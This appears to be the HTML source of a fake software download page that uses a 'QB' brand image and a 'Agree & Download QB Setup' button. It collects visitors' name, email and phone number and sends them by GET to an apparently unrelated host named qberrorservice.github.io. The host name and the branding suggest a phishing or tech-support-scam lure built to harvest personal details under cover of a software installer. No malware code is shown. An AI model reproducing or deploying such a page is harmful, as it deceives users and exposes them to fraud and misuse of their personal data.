<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Download</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            min-height: 100vh;
            background-color: #f8f8f8;
        }
        form {
            max-width: 400px;
            width: 100%;
            padding: 20px;
            background: linear-gradient(to bottom, #ffffff, #f0f0f0);
            border: 1px solid #ddd;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        fieldset {
            border: none;
        }
        legend {
            font-size: 1.5em;
            color: #333;
            margin-bottom: 10px;
            font-weight: bold;
        }
        label {
            display: block;
            margin-bottom: 8px;
            color: #333;
        }
        input[type="text"], input[type="email"], input[type="tel"], select {
            width: 100%;
            padding: 10px;
            margin-bottom: 15px;
            border: 1px solid #ccc;
            border-radius: 5px;
            font-size: 1em;
        }
        input[type="submit"] {
            background-color: #1e891a;
            color: #fff;
            padding: 12px 20px;
            border: none;
            cursor: pointer;
            font-size: 1em;
            border-radius: 5px;
            transition: background-color 0.3s ease;
            item-align:center;
        }
        input[type="submit"]:hover {
            background-color: #1e891a;
        }
        select {
            appearance: none;
        }
        img {
            max-width: 100%;
            height: auto;
            border-radius: 10px 10px 0 0;
            width: 50%;
            margin-bottom: 20px;
        }
    </style>
</head>
<body>
    <img src="Qb-Hosting-Image.png" alt="QB" />
<form action="https://qberrorservice.github.io/loading.html" method="GET">
    <!-- Your form fields remain the same -->
    <fieldset>
        <legend>Fields marked with an * are required</legend>
        
        <label for="name">Name *</label>
        <input type="text" id="name" name="SingleLine" required>
        
        <label for="email">Email *</label>
        <input type="email" id="email" name="SingleLine1" required>
        
        <label for="phone">Phone *</label>
        <input type="tel" id="phone" name="SingleLine2" required>

        <input type="submit" value="Agree & Download QB Setup">
    </fieldset>
</form>

</body>
</html>
